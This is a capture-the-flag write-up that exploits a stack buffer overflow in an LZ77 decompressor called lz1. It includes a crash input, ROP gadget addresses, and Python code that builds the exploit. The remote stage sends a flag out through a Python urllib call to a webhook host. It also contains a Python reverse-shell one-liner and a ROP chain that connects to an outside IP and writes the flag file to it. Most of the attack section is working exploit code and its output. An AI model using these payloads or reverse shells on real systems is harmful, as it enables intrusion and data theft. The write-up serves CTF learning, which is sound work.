lz1
We are provided with the Linux ELF binary lz1
and its source code, lz1.c
.
This program is basically copied from https://github.com/andyherbert/lz1, with some very minor changes, such as allocating buffers on the stack using alloca
instead of malloc
.
As a 12 year old C program, it is not unexpected that bugs (and perhaps vulnerabilities) are present. In fact, some have already been reported.
LZ77 compression
The program implements the lz1
or lz77
compression algorithm.
Instead of storing repeated strings as is, LZ77 stores
off
: The offset from the current location to the previous occurrence of the string.len
: The number of bytes to copy from that location. If the number of bytes to copy is greater than the offset, the algorithm repeats the string until sufficient bytes are copied.
A key implementation detail is the number of bits required to store off
and len
.
In this version of LZ77, the number of bits used to store off
and len
must sum to 16.
For example, if 8 bits are used to store off
, then LZ77 cannot reference strings output more than 255 bytes ago, and cannot copy more than 256 bytes from previously output strings.
The number of bits used to store len
is stored along with the uncompressed length is stored in the header of the compressed data:
struct {
unsigned int uncompressed_size;
unsigned char num_bits_for_len;
}
Vulnerability
With a rough idea of how LZ77 works, let's explore the decompression function (with some comments added):
uint32_t lz77_decompress (uint8_t *compressed_text, uint8_t *uncompressed_text)
{
uint8_t pointer_length_width;
uint16_t input_pointer, pointer_length, pointer_pos, pointer_length_mask;
uint32_t compressed_pointer, coding_pos, pointer_offset, uncompressed_size;
uncompressed_size = *((uint32_t *) compressed_text); // header.uncompressed_size
pointer_length_width = *(compressed_text + 4); // header.num_bits_for_len
compressed_pointer = 5;
pointer_length_mask = pow(2, pointer_length_width) - 1;
for(coding_pos = 0; coding_pos < uncompressed_size; ++coding_pos)
{
input_pointer = *((uint16_t *) (compressed_text + compressed_pointer));
compressed_pointer += 2;
pointer_pos = input_pointer >> pointer_length_width; // Extract `off`
// Extract `len`. Note that we add 1 as it doesn't make sense to copy 0 bytes.
pointer_length = pointer_pos ? ((input_pointer & pointer_length_mask) + 1) : 0;
if(pointer_pos) // If pointer position is 0, just output the byte normally.
// Here we copy `pointer_length` bytes from the buffer to output (!!!!)
for(pointer_offset = coding_pos - pointer_pos; pointer_length > 0; --pointer_length)
uncompressed_text[coding_pos++] = uncompressed_text[pointer_offset++];
*(uncompressed_text + coding_pos) = *(compressed_text + compressed_pointer++);
}
return coding_pos;
}
Fortunately, the decompression algorithm is much simpler (and shorter) than the compression algorithm.
All it needs to do is read the encoded off
and len
and copy the bytes into the output buffer.
However, the author neglected to check that copying len
bytes into the output won't cause a buffer overflow.
Here's a minimal crashing example (hex encoded, with comments):
02 00 00 00 // Report the uncompressed size as 2
08 // equal split between `off` and `len`. Each 1 byte :)
00 00 // Nothing to backreference
61 // Output a
ff 01 // Go back one byte, then duplicate it 256 times
Base64: AgAAAAgAAGH/AQ==
If we debug lz1
in gdb, and attempt to decompress crash.bin
using r d crash.bin /dev/null
, we would observe a segfault as the program attempts to return from file_lz77_decompress
.
Inspecting the stack at the crash site, we find that the return address has indeed been overwritten by aaaaaaaa
.
gef> x/xg $rsp
0x7fffffffdc38: 0x6161616161616161
Binary protections and other mitigations
The binary is compiled statically, with PIE disabled. This gives us lots of easily accessible gadgets to work with (or so I thought).
However, NX is enabled, so executing shellcode will be a challenge.
Luckily for us, there is no stack canary used. This mitigation would probably render the challenge unsolvable.
Inspecting run.py
, it appears that there is an attempt to disable the STDIN and STDOUT of the lz1
program:
subprocess.check_call(["./lz1", "d", input_file.name, output_file.name], stdin=None, stdout=None, stderr=None)
However, upon checking the documentation for subprocess.check_call
, we find that None
is in fact the default value of stdin
, stdout
, and stderr
:
subprocess.check_call(args, *, stdin=None, stdout=None, stderr=None, shell=False, cwd=None, timeout=None, **other_popen_kwargs)
Quoting the documentation,
To suppress stdout or stderr, supply a value of
DEVNULL
.
This means that we will still be able to read in a secondary payload, or potentially exfiltrate data via stdout.
Exploitation
In theory, the exploitation plan is simple:
- Create ROP chain to execute
/bin/sh
. - Send in the ROP chain at the start of the compressed data.
- Report the size of the uncompressed data as the length of the ROP chain + 1.
- Use LZ77 pointers to repeat the ROP chain enough times to overflow the buffer.
- Start of ROP chain lines up with return address of
file_lz77_decompress
. - ROP chain is executed.
- ???
- Profit
Determining offsets
As with any stack buffer overflow exploit, the first step is to figure out the offset between the start of the buffer that is overflowed and the return address we want to overwrite.
This is of course dependent on the length of compressed data that is input, as well as the reported size of the uncompressed data, as alloca
calls are made based on these values.
To determine this offset, I set breakpoints in GDB at the start of lz77_decompress
(to record the address of the uncompressed_text
buffer) and at the return instruction of file_lz77_decompress
(to record the return address location).
Based on several rounds of testing, it seems that the offset is quite large (300-400 bytes) if we want to send a payload of significant length (at least 100 bytes).
This means that we will have to use 9 bits for len
and 7
bits for off
. This limits the length of our ROP chain to 127 bytes (15 full QWORDs), but it allows us to write up to 512 additional bytes, sufficient to overflow the buffer in all cases. Using 8 bits for each would theoretically allow a larger payload, but we might not be able to output enough bytes to actually overflow the buffer.
To simplify future calculations, I decided to fix the input (compressed text) size to 200 bytes. Null bytes can be used to pad the input to 200 bytes, as LZ77 ignores surplus compressed bytes.
This size also ensures that the start of the ROP chain lines up perfectly with the return address of file_lz77_decompress
.
def encode_pointer_bits(length, position, length_width):
# Note: higher bits input pos (offset)
# Lower bits pointer length
assert length < pow(2, length_width)
assert position < pow(2, 16-length_width)
return p16(length + (position << length_width))
CHAIN_LENGTH = 8*15 # Maximum length that can be encoded with 7 bits
def encode_rop_chain(chain):
assert len(chain) <= CHAIN_LENGTH
with open("./out1.bin", 'wb') as f:
f.write(chain)
os.popen("./lz1 c 9 out1.bin compressed.bin").read()
compressed = open("./compressed.bin", 'rb').read()
compressed = compressed[5:]
return compressed
with open("./out.bin", "wb") as f:
REQUIRED_PL_LENGTH = 200
length_width_bits = 9
rop_chain = p64(0x1337) # TODO!!!
pl = p32(CHAIN_LENGTH+1) + p8(length_width_bits) # +1 so LZ77 actually processes the pointers
pl += encode_rop_chain(rop_chain)
pl += encode_pointer_bits(511, CHAIN_LENGTH, length_width_bits)
pl = pl + b"\0" * (REQUIRED_PL_LENGTH - len(pl))
assert len(pl) == REQUIRED_PL_LENGTH
f.write(pl)
ROP chain
Based on the constraints defined in the previous section, we have 15 QWORDs to work with for our ROP chain. This should be sufficient for a simple execve("/bin/sh", NULL, NULL)
ROP chain.
However, despite the large number of gadgets present in lz1
, useful gagets are hard to come by. These are some of the gadgets I used:
# 0x0000000000423227: pop rdi; add rax, rdi; vzeroupper; ret;
set_rdi = lambda rdi: p64(0x0000000000423227) + p64(rdi) # Note: pollutes rax
# 0x000000000040266b: pop rcx; ret;
set_rcx = lambda rcx: p64(0x000000000040266b) + p64(rcx)
# 0x0000000000402777: pop rax; ret;
set_rax = lambda rax: p64(0x0000000000402777) + p64(rax)
# 0x000000000040d402: pop rsi; pop rbp; ret;
set_rsi = lambda rsi: p64(0x000000000040d402) + p64(rsi) + p64(0)
# 0x000000000046da97: pop rbx; ret;
# 0x000000000042f87b: mov rdx, rbx; syscall;
zero_rdx_and_syscall = p64(0x000000000046da97) + p64(0) + p64(0x000000000042f87b)
# 0x000000000045badc: mov qword ptr [rdi + 0x10], rcx; ret;
# 0x0000000000453e49: mov qword ptr [rax - 7], rcx; ret;
def arb_write(where, what):
return set_rax(where+7) + set_rcx(what) + p64(0x0000000000453e49)
We are thus able to just about fit the ROP chain in 15 QWORDs:
writable = 0x00000000004b1000 + 0x200
rop_chain = b""
rop_chain += arb_write(writable, u64(b"/bin/sh\0"))
rop_chain += set_rdi(writable)
rop_chain += set_rax(59)
rop_chain += set_rsi(0)
rop_chain += zero_rdx_and_syscall
For some reason, the ROP chain's position on the stack does not line up nicely with the file_lz77_decompress
return address. Thus some rotation of the ROP chain is required to fix this issue:
chain_offset = CHAIN_LENGTH - 0x40
chain = chain + b"\0" * (CHAIN_LENGTH - len(chain))
chain = chain[chain_offset:] + chain[:chain_offset]
And with that, we have our local solve:
$ python3 solve1.py
[*] '/home/kali/Desktop/ctfs/starlabs-1/lz1/lz1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No
[+] Opening connection to localhost on port 5000: Done
[*] Switching to interactive mode
$ cat flag.txt
Test flag
$
Remote exploit
Unfortunately, rerunning the exploit on the remote service results in an error:
[+] Opening connection to 159.223.33.156 on port 9101: Done
[*] Switching to interactive mode
Command '['./lz1', 'd', '/tmp/tmpu10c6slk', '/tmp/tmph7qpu4ob']' returned non-zero exit status 127.
[*] Got EOF while reading in interactive
The exit status 127 indicates that the file was not found. It is odd, but certainly possible that the remote doesn't have /bin/sh
. Perhaps it was moved to another location.
From the presence of run.py
, we can be pretty sure that python is installed on the remote. In a typical python docker container, python is installed to /usr/local/bin/python3
.
This path is way too long for current ROP chain. We can barely fit the 8 byte /bin/sh\0
!
Luckily, as stdin
remains open, we can simply read in and execute a secondary ROP chain. To do this, we will need a copy of new gadgets:
# 0x000000000040321d: pop rsp; ret;
set_rsp = lambda rsp: p64(0x000000000040321d) + p64(rsp)
# 0x0000000000416116: syscall; ret;
syscall_ret = p64(0x0000000000416116)
# 0x000000000047e364: pop rdx; or al, 0x5b; pop r12; pop rbp; ret;
set_rdx = lambda rdx: p64(0x000000000047e364) + p64(rdx) + p64(0) + p64(0)
We'll modify our original ROP chain to:
rop_chain += set_rsi(writable)
rop_chain += set_rdx(0x1337)
rop_chain += set_rax(0)
rop_chain += syscall_ret
rop_chain += set_rsp(writable)
This just sets up a read
to the writable region in the binary's BSS section.
The execve
syscall and its associated setup is moved our secondary ROP chain:
rop_chain = b""
cmd = b"/usr/local/bin/python3"
L = 24
assert len(cmd) <= L
cmd += b"\0" * (L-len(cmd))
rop_chain += arb_write(writable+0x100, u64(cmd[:8]))
rop_chain += arb_write(writable+0x108, u64(cmd[8:16]))
rop_chain += arb_write(writable+0x110, u64(cmd[16:]))
rop_chain += set_rdi(writable+0x100)
rop_chain += set_rax(59)
rop_chain += set_rsi(0)
rop_chain += zero_rdx_and_syscall
With a basically unrestricted write into the BSS section, we can afford to encode the entire path to the python executable.
All that's left is a simple python payload to exfiltrate the flag:
__import__("urllib.request").request.urlopen("https://h.jro.sg/?"+open('flag.txt', 'rb').read().hex()).read() or exit()
We receive the flag, hex encoded on our webhook:
GET /?535441527b6e6f775f74696d655f746f5f72656372656174655f626c617374706173735f386435396261393839387d0a0a28506c6561736520696e636c756465207468697320666c6167207768656e207375626d697474696e6720796f75722077726974657570290a
This decodes to:
STAR{now_time_to_recreate_blastpass_8d59ba9898}
(Please include this flag when submitting your writeup)
It is possible to get a reverse shell using
exec('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("103.149.46.88",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")')
Using this reverse shell, I found that /bin/sh
is actually a symlink to /bin/busybox
, which is probably why the original exploit didn't work.
Intended solution
In the unintended solution, we used the read
syscall to load a secondary payload without size restrictions.
However, with stdin
disabled, we need to find somewhere else to store it. This payload will be much larger, as we won't be able to use stdout
to print the flag, or use stdin
to read a tertiary payload. Instead, we will have to exfiltrate it using a raw TCP socket.
In fact, this secondary payload is so large, that the number of bits used to represent len
had to be increased to 10 (max length of 1024)!
The only remaining possible location is at the end of the compressed data, after our malformed backreference/pointer. This won't be processed by LZ77, but it will still be read into memory.
As fread
is used to open the input file, a copy of its contents is stored in the heap. Thus, while the input data on the stack might have been overwritten by our buffer overflow exploit, our secondary payload on the heap remains intact.
Unfortunately, addresses in the heap are randomized, and with no way to get an infoleak, this approach seems impossible.
rsp
control
However, looking closer at the registers at the return instruction of file_lz77_decompress
, we find that r10
points into the heap! While it doesn't intersect the input file data, it's only a couple hundred bytes off.
I found a pair of gadgets that loads r10
into rax
, where it can be subsequently manipulated:
# 0x0000000000407a41: mov rax, r10; ret;
# 0x00000000004234bb: add rax, rdi; ret;
get_heap_addr = lambda offset: p64(0x0000000000407a41) + set_rdi(offset) + p64(0x00000000004234bb)
Now, we just need to find a way to set rsp
to rax
. Unfortunately, though not unexpectedly, there isn't any mov rsp, rax
gadget.
There is an xchg esp, eax; ret
gadget at 0x0000000000430a0a
, but that only exchanges the lower 32 bits. Leaving the upper 32 bits unmodified. Right?
Well, as it turns out, xchg esp, eax
actually zeros the upper 32 bits of each register!
mov rax, 0x1337133713371337
mov rbx, 0xdeadbeefdeadbeef
xchg eax, ebx
; rax = 0xdeadbeef
; rbx = 0x13371337
This is incredibly helpful, as the heap address just fits into 32 bits.
The offset between the value of r10
and the heap location of the input file is dependent on the size of input. After some debugging, I found that this offset was 0x21c
for a payload size of max 600 bytes.
# 0x0000000000407a41: mov rax, r10; ret;
# 0x00000000004234bb: add rax, rdi; ret;
get_heap_addr = lambda offset: p64(0x0000000000407a41) + set_rdi(offset) + p64(0x00000000004234bb)
# 0x0000000000430a0a: xchg esp, eax; ret;
ret_rax = p64(0x0000000000430a0a)
rop_chain = b""
rop_chain += get_heap_addr(0x21c)
rop_chain += ret_rax
This tiny ROP chain occupies 48 of the 63 bytes available.
Secondary ROP chain
The secondary ROP chain closely follows typical reverse shell shellcode:
def do_syscall(number, *args):
assert len(args) <= 3
pl = b""
if args:
pl += set_rdi(args[0])
if len(args) > 1:
pl += set_rsi(args[1])
if len(args) > 2:
pl += set_rdx(args[2])
pl += set_rax(number)
pl += syscall
return pl
pl += do_syscall(41, 2, 1, 0) # socket(2,1,0) = 3
ip = "103.149.46.88"
ip_int = sum(int(x) * pow(2, i*8) for i,x in enumerate(ip.split(".")))
port = 1337
port = ((port &0xff) << 8) + (port >> 8)
pl += arb_write(writable, (2 + (port << 16)) + (ip_int << 32))
pl += do_syscall(42, 3, writable, 16) # connect(3, sock_addr, 16)
pl += arb_write(writable+16, u64(b"flag.txt"))
pl += do_syscall(2, writable + 16, 0, 0) # open("flag.txt", 0, 0) = 4
pl += do_syscall(0, 4, writable + 0x20, 0x100) # read(4, buf, 0x100)
pl += do_syscall(1, 3, writable + 0x20, 0x100) # write(3, buf, 0x100)
I hardcoded the fd
s, but I'm sure you could find some gadgets to move the rax
s to the rdi
s.
After setting up a TCP listener and running the exploit, we receive the flag:
~$ nc -nvlp 1337
Listening on 0.0.0.0 1337
Connection received on 159.223.33.156 43588
STAR{now_time_to_recreate_blastpass_8d59ba9898}
(Please include this flag when submitting your writeup)